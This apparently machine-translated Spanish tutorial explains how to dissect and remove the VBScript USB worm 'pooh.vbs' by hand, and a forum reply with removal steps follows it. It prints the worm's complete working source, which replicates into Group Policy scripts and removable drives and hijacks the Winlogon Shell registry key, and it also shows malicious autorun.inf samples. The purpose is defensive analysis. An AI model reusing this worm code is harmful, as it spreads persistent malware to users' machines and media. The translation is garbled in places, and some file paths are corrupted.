Alguna vez has querido saber cmo todos esos virus se instalan en su sistema?

Me pregunto por
qu el sistema se inicia actuando de manera extraa , pero el AV no puede detectar nada?
Siempre quise saber cmo se siente al cazar un virus es dueo de su propio en el vasto desierto de
su propia PC ? Con este tutorial puedes probarlo.
Este tutorial es acerca de los scripts (VBS) de virus , la identificacin de ellos , contradiciendo y
eliminarlos manualmente si el AV no puede identificarlos. Consejos sobre cmo mantener su
sistema se infecte de ellos tambin sern discutidos aqu .
Acerca de virus scripts VBS :
Este tipo de archivos son slo archivos de comandos regulares. Pueden contener cualquier cosa,
desde los scripts tiles sutiles cdigos corruptoras del sistema. Pequeo como estos scripts
pueden ser, con malas intenciones del autor , son tan capaces de causar estragos como cualquier
otro virus. Al ser archivos de script , tienen la ligera ventaja de no ser identificado por la mayora
de AV (excepto , por supuesto, si el archivo de secuencia de comandos contiene partes de cdigo
que AVs todava lo usan para identificarlos como los virus. ) Ante este hecho es por eso que una
gran cantidad de estos scripts son extendido por todas partes.
Mtodos de propagacin :
El mtodo principal de estas secuencias de comandos para la difusin est utilizando las funciones
de ejecucin automtica del sistema de Windows. Con este mtodo se propagan usando
dispositivos de memoria externos, incluyendo pero no limitado a memorias USB y tarjetas de
memoria , como portadores . Con el gran porcentaje de los usuarios de Windows no saber cmo la
funcin de ejecucin automtica puede ser un riesgo, la seguridad , no es de extraar cmo estos
scripts se pueden propagar libremente con muy poco de moderacin .
Cmo protegerse :
Para protegerse , usted puede tomar las siguientes medidas :
1 . Desactivacin de la funcin de ejecucin automtica.
2 . Aprende a acceder a las unidades haciendo clic derecho en el icono del disco y elegir Abrir en
lugar de hacer doble clic.
3 . En lugar del punto 2 , Aprende a acceder a las unidades escribiendo la letra de unidad en la
barra de direcciones y pulsa enter.
* Se explicar en la seccin Scripts Virus Contrarrestar

(Consejos de proteccin 1 y 2 crditos van a Mojica, que me dio DarKristal )

Para desactivar la funcin de ejecucin automtica , siga estos pasos .
1 . Vaya a Inicio > Ejecutar, escriba " gpedit.msc " sin las comillas y presiona Enter.
2 . Lo que se busca son las siguientes






Tanto el de la "Vuelta de Autoplay" debe ser "activado" como en los casquillos de la pantalla, as
como la opcin "Otra vuelta de Reproduccin automtica en" bajo la pestaa Configuracin para
establecer en "todas las unidades".

Lucha contra Virus Scripts:
Lo Primero que nada es para detener las instancias de la escritura de virus ( s ) que se
ejecutan en segundo plano . Vamos a hacer un poco de matanza Manual de algunos
procesos con el administrador de tareas . Para acceder al administrador de tareas puede
hacer clic derecho la barra de tareas y seleccione " Administrador de tareas " o puede pulsar
el buen viejo Ctrl + Alt + Supr combinacin de teclas . Lo que estamos buscando es en
realidad el programa que ejecuta los scripts de virus y por desgracia en este caso es un
componente de Windows , es decir, " wscript.exe " . Si encuentra wscript ejecuta en
segundo plano y sin su conocimiento lo ms probable es que usted est infectado con un
virus de la escritura. Simplemente elimine todas las instancias de wscript ( si hay ms de
uno se est ejecutando ) . Despus de esto podemos proceder a las partes buenas.
Obtenga sus cuchillos quirrgicos yerran ... teclados listos . Es hora de diseccionar un script
virus. Para esta seccin vamos a utilizar este script actual virus que se conoce con el
nombre de archivo " pooh.vbs ", tambin conocido como " Aikelyu " ( que te mate ) . Al
igual que su nombre, se trata de una secuencia de comandos en lugar de virus inofensivos,
pero una molestia, no obstante. Si usted est infectado con l, cada vez que usted inicia la
sesin, un archivo html con el mensaje " ' Jayker '
PogitosGwaposAmigosGarantisadosGalantis Kaayos ! ", Que de acuerdo con quien hizo
ESS , palabra por palabra se traduce como " <creators handle>
HandsomeHandsomeFriendsGuaranteedGallant Muy !" No es que tenemos que saber lo
que significa.

Lo que lo hace un buen ejemplo es que tiene todas las caractersticas de un virus tpico.
Replicacin, al hacer copias de seguridad ocultos de s mismo, edita el registro y asegurarse de que
infecta todos los dispositivos de memoria externa que se conecta a la mquina mientras se est
ejecutando y una carga til de mostrar un mensaje extrao en un html a cada inicio de sesin. Esto
es seguro para mantenerte ocupado durante unos minutos.
Antes de continuar, por si acaso usted es un novato probar esta diseccin de la escritura, es mejor
tener una cura segura a la mano. Aunque este script virus ahora puede ser detectado por la
mayora de AV como el virus VBS / AutoRun.G , la mayora de AV no restauran el registro cambia el
guin hace . Slo una medida de seguridad en caso de que accidentalmente infectarse con
pooh.vbs . Descargue e instale ESS desde este sitio. Es un pequeo proyecto Anti Virus hecho
especialmente para los scripts de virus ( pooh.vbs incluidos) . Puede obtener ms informacin
acerca de ESS desde el lugar de la persona que hizo el mini- AV.
Antes de continuar con el plato principal vamos a echar un vistazo a su cmplice en el archivo "
autorun.inf" . El archivo autorun es un archivo que contiene informacin sobre lo que se supone
que debe funcionar de forma automtica y alguna otra informacin adicional, como la imagen del
icono de la unidad se supone que utiliza y otras cosas.
Para nuestro script virus bah esto es lo que est contenido en ella de autorun.inf
[autorun ]
pooh.vbs shellexecute = wscript.exe
Dos lneas simples llenas de malas intenciones . En un equipo en el que est habilitada la ejecucin
automtica , el segundo que el sistema haya terminado de cargar controladores para los medios
de comunicacin que contiene el virus , el script se ejecuta automticamente en segundo plano ,
lo que permite a copiarse a s mismo a sus escondites predeterminados y la otra maldad que trae.
Clever s, pero no tan inteligente como este otro ejemplo de ejecucin automtica de otro virus .
[autorun ]
= abierto

shell \ open \ command = RECYCLER \ info.exe
shell \ open \ Default = 1
shell \ explore \ Command = RECYCLER \ info.exe
Note "shell \ open \ Command =" y " shell \ explore \ Command ="? Qu los hace? Oh, nada
realmente. Slo se secuestra el Abierto y Explorar en el men emergente cuando damos click
derecho en el icono de la unidad, lo que permite que el programa se ejecute incluso si elegimos
Abrir o Explorar en el men emergente. Eh Nasty ? Funciona incluso si la Reproduccin automtica
ya est desactivada. Por eso le di el consejo nmero tres en la seccin de proteccin de s mismo,
para acceder a una unidad, escriba la letra de unidad en la barra de direcciones y pulsar enter en
vez de la punta # 2 . Nunca podemos estar seguros en estos das.
Esto en cuanto a los archivos del autorun, en que la diseccin de Pooh . Uno no tiene que saber
VBS codificacin conocer el interior de este beb. Slo tienes que por lo menos ser capaz de
reconocer las ubicaciones de archivos y entradas del registro. A continuacin se muestra el cdigo
completo dentro pooh.vbs
'Ngaran Ko Aikelyu! Bulos Waray Waray!!!
on error resume next
dim mysource
dim path
dim fdrive
dim fs
dim pf
dim infdrive
dim bf
dim rg
dim nt
dim sd
dim check
dim msgnp
dim inigpfolder_p
dim inigpfolder_t
dim text,size
infdrive = "[autorun]"&vbcrlf&"shellexecute=wscript.exe pooh.vbs"
msgnp = "<html>"&vbcrlf&"<head></head>"&vbcrlf&"<title>Aikelyu</title>"&vbcrlf&"<body bgcolor=black>"&vbcrlf&"<font color=red
size=+5>"&vbcrlf&"<center>"&vbcrlf&"<b>"&vbcrlf&"<aikelyu>'Jayker' PogitosGwaposAmigosGarantisadosGalantis
Kaayos!!</aikelyu>"&vbcrlf&"</b>"&vbcrlf&"</center>"&vbcrlf&"</font>"&vbcrlf&"</body>"&vbcrlf&"</html>"
inigpfolder_p =
""&vbcrlf&"[Startup]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Shutdown]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf
&"0Parameters="
inigpfolder_t =
""&vbcrlf&"[Logon]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Logoff]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0
Parameters="
set fs = createobject("Scripting.FileSystemObject")
set pf = fs.getfile(Wscript.ScriptFullname)
set text=pf.openastextstream(1,-2)

size = pf.size
check = pf.drive.drivetype
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set path = fs.getspecialfolder(0)
set bf = fs.getfile(path &"\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\kernel.dll.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\kernel.dll.vbs")
bf.attributes = 39
bf.close

'Startup
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")
bf.attributes = 39
bf.close

'Shutdown
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")
bf.attributes = 39
bf.close

'Logon
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")
bf.attributes = 39
bf.close

'Logoff
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")
bf.attributes = 39
bf.close

>set bf=fs.getfile(path &"\system32\aikelyu.html")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\aikelyu.html",2,true)
bf.write msgnp
set bf=fs.getfile(path &"\system32\aikelyu.html")
bf.attributes = 39
bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")
bf.attributes=32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini",2,true)
bf.write inigpfolder_p
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")
bf.attributes=39
bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")
bf.attributes=32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini",2,true)
bf.write inigpfolder_t
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")
bf.attributes=39
bf.close

set bf=fs.getfile(path &"\Debug\pooh.vbs")
bf.attributes=32
set bf=fs.createtextfile(path &"\Debug\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\Debug\pooh.vbs")
bf.attributes=39
bf.close

for each fdrive in fs.drives
If (fdrive.drivetype = 1 or fdrive.drivetype = 2) and fdrive.path <> "A:" then
set bf=fs.getfile(fdrive.path &"\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(fdrive.path &"\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(fdrive.path &"\pooh.vbs")
bf.attributes = 39
bf.close

set bf =fs.getfile(fdrive.path &"\autorun.inf")
bf.attributes=32
set bf=fs.createtextfile(fdrive.path &"\autorun.inf",2,true)
bf.write infdrive
set bf =fs.getfile(fdrive.path &"\autorun.inf")
bf.attributes=39
bf.close

end if
next

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu",path&"\system32\aikelyu.html"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe
"&path&"\system32\kernel.dll.vbs"
if check <> 1 then
Wscript.sleep 20000
end if
loop while check<>1

set sd = createobject("Wscript.shell")
sd.run path&"\system32\aikelyu.html /e,/select, "&Wscript.ScriptFullname
Lo que buscamos aqu es encontrar las maneras de contrarrestar y eliminar los efectos de la
escritura de virus, por lo que puede relajarse y no prestar demasiada atencin a todo el
cdigo confuso. Lo que vamos a buscar primero es donde el esconde copias de s mismo y
lo que esconden bajo los nombres. Este archivo es un VBScript que puede limitar la
bsqueda a la bsqueda de cadenas que tienen vbs mencionan en ellos como . :

conjunto bf = fs.getfile (path & " \ system32 \ kernel.dll.vbs ")
conjunto bf = fs.getfile (path & " \ system32 \ GroupPolicy \ Machine \ Scripts \ Startup \
pooh.vbs " ) y
conjunto bf = fs.getfile (path & " \ system32 \ GroupPolicy \ Machine \ Scripts \ Shutdown \
pooh.vbs ")

Los siguientes son ejemplos de los lugares donde Pooh esconde una copia de s mismo . La
" trayectoria y " representa el directorio en el que instal su sistema operativo . Suponiendo
, para este ejemplo el sistema operativo se encuentra en C : \ WINDOWS entonces,
trayectoria y "\ system32 \ kernel.dll.vbs " significa C: \ Windows \ system32 \
kernel.dll.vbs .
trayectoria y "\ system32 \ GroupPolicy \ Usuario \ Scripts \ cierre de sesin \ scripts.ini ")
< == ese trozo de cdigo significa que est ubicado en la que instal su sistema operativo
ex C : . \ windows \ system32 \ GroupPolicy \ usuario \ Scripts \ Cierre de sesin
Tambin explorar el resto del archivo de comandos para ver todos los archivos que se
generan a partir de la secuencia de comandos , como los archivos . Ini y el archivo html .
Para se pone el elemento emergente de inicio de sesin pulg Mejores tomar notas de todos
los archivos que usted ve y sus ubicaciones . Usted va a necesitar para despus.
Siguiente en la lista es la bsqueda de las claves de registro que el virus agrega y o
modificaciones en el registro. Afortunadamente Pooh slo puso dos cambios en el registro:
rg.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu"
,path&"\system32\aikelyu.html"
rg.regwrite
"HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \ CurrentVersion \
Winlogon \ Shell" ,
" Explorer.exe " & ruta & " \ system32 \ kernel.dll.vbs "
Lo que la primera entrada del registro que hace es inserta un valor de cadena bajo
[ HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run ]
que hace que el archivo html molesto, a saber, " aikelyu.html " pop-up cada inicio de sesin
. La segunda entrada del registro se cambia el valor original
[ HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion
\ Winlogon ]
"Shell " = " Explorer.exe " a " Explorer.exe C: \ WINDOWS \ system32 \ kernel.dll.vbs " .
Esto asegura que una instancia de Pooh es runring cuando se carga el explorador.
Eso es bastante mucho al respecto. Todo lo que necesitas saber son los archivos que genera,
en los que estn ocultos, compruebe la configuracin de registro que cambia y que es casi
todo lo que hay que hacer. Puede hacer caso omiso de las otras partes, ya que son tiles
para el propio guin y no ser de mucha utilidad para usted. Cuando est seguro de que
haya una lista de los archivos que genera y tambin sabe los valores que ha aadido /
cambiado usted puede probar la cura del Registro.
La cura:
Usted est bastante seguro de que no ha perdido nada y estn dispuestos a matar a la
secuencia de comandos de forma permanente. Asumiendo que estamos despus pooh.vbs ,
este es el momento para pasar a la etapa de safari de caza . Para empezar las cosas,
asegrese de matar a todos los casos de ejecucin de scripts desde el fondo. Luego, con la
lista que ha generado a partir de las notas que se reunieron a partir de la secuencia de
comandos virus diana, cazar las copias ocultas de la escritura de virus y otros archivos que
gener alrededor de todos los lugares que usted ha enumerado abajo. Eliminacin de ellos
no es que gran parte de un problema, ya que slo puede borrarlos incluso si son menores
atributos de archivo del sistema.
* Para obtener los mejores resultados, es mejor si se establece el sistema para mostrar los
archivos ocultos y de sistema, ya que algunos de los archivos que est buscando son la
mayor parte del tiempo bajo los atributos de los archivos del sistema y pueden no ser
visibles.
Despus de haber cazado hasta la ltima copia de la escritura de virus y todos los dems
archivos que gener, es el momento de continuar con el registro. En el editor de registro
vaya a donde las teclas aadido / cambiado por el script es y eliminar / restaurar. Para abrir
el registro slo tiene que ir a Inicio> Ejecutar tipo "regedit " y presionar enter.
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu"
,path&"\system32\aikelyu.html"
rg.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows NT \
CurrentVersion \ Winlogon \ Shell ", " Explorer.exe " & ruta & " \ system32 \ kernel.dll.vbs
"
Qu se puede hacer con esas entradas es borrar el primero y restaurar el segundo a su valor
original . (Si no tiene experiencia en la edicin del registro le sugiero que ejecute ESS para
restaurar los valores automticamente.
Fin :
Eso lo resume todo. Para todos los novatos que trataron este tutorial cabo acabas matado su
primer script virus. Felicitaciones. Algunos encuentran esta actividad agradable y un poco
adictivo , matando a todos los scripts , convirtiendo sus entraas . Una buena experiencia
para todos con seguridad.
- ID10t.Daemon

Crditos
Mojica de HMU por su vasto conocimiento. Puede que no sea capaz de hablar mucho con
l, pero sus mensajes en los foros son como el oro.
DarKristal y todos los miembros del equipo Freelance para empezar me fuera en esta locura
de la caza del virus VBS .
Francis el Autor de Soluciones Emergencia Seguridad y el que inici la locura de la caza en
equipo Freelance .



Bueno te paso el procedimiento exacto de como eliminarlo manualmente.

Si tenes Windows XP o ME desactiva "Restaurar Sistema" (esto es vital).
Primero terminar el programa del malwere.
1- Abrir el Administrador de Tareas de Windows.
En Windows 98 y ME, pulse
CTRL + ALT + SUPR
En Windows NT, 2000 2003, pulse
CTRL + SHIFT + ESC, a continuacin, haga clic en la pestaa Procesos.
2- En la lista de programas en ejecucin, localizar el proceso:
WScript.exe
3- Seleccione el programa malicioso, a continuacin, pulse Finalizar tarea ni a la o el botn
Finalizar tarea, en funcin de la versin de Windows en su ordenador.
4- Para comprobar que el proceso haya terminado, cierre el Administrador de tareas y, a
continuacin, lo vuelve a abrir.
5- Cerrar el Administrador de tareas.

Segundo eliminar los autostart del registro
1- Abrir el editor de registro. Haga clic en Inicio> Ejecutar, escriba REGEDIT, y luego
pulse Enter.
2- En el panel de la izquierda, haga doble clic en el siguiente:
HKEY_LOCAL_MACHINE> Software> Microsoft> Windows> CurrentVersion>
Policies> Explorer> Run
3- En el panel derecho, localizar y borrar la entrada:
Explorer = ". Vbs"
4-Cerrar el Editor de Registro.

Tercero eliminar el Malware de archivo
1- Haga clic derecho en "Inicio" y despus haga clic en Buscar.
2- En el cuadro de entrada, escriba:
% System% \. Pif
(98 2000, o C: \ Windows \ System32 en Windows XP y Server 2003.)
3-En Buscar en la lista desplegable, seleccione la unidad que contiene Windows, pulse
Entrar.
4-Una vez localizado, seleccione el archivo y luego presione SHIFT + SUPR.
5-Repita los pasos 2-4 para el siguiente archivo (s):
% System% \. Uce

Cuarto eliminar los AUTORUN.INF que crea el Malware.
1-Haga clic derecho en "Inicio" y despus haga clic en Buscar
2- En el cuadro de entrada, escriba:
AUTORUN.INF
3- En Buscar en la lista desplegable, selecciona una unidad, a continuacin, pulse Intro.
4- Seleccione el archivo, luego abrir usando el Bloc de Notas.
5- Compruebe si las siguientes lneas estn presentes en el archivo:
Cita:Forgiveme
[Autorun]
Abierto = wscript.exe information.vbs
Shell \ open \ Command = wscript.exe information.vbs
Shell \ encontrar \ Command = wscript.exe information.vbs
Shell \ open \ default = 1

6- Si las lneas estn presentes, elimine el archivo.
7- Repita los pasos 3 a 6 para los archivos AUTORUN.INF en el resto de unidades
extrables.
Cerrar los resultados de la bsqueda

Listo con eso vas a eliminar completamente a ese virus. Si queres realiza un escaneo en
modo seguro por las dudas pero no creo q sea necesario, pero asi te agarras por si tenes otra
cosa.
Suerte espero haberte ayudado.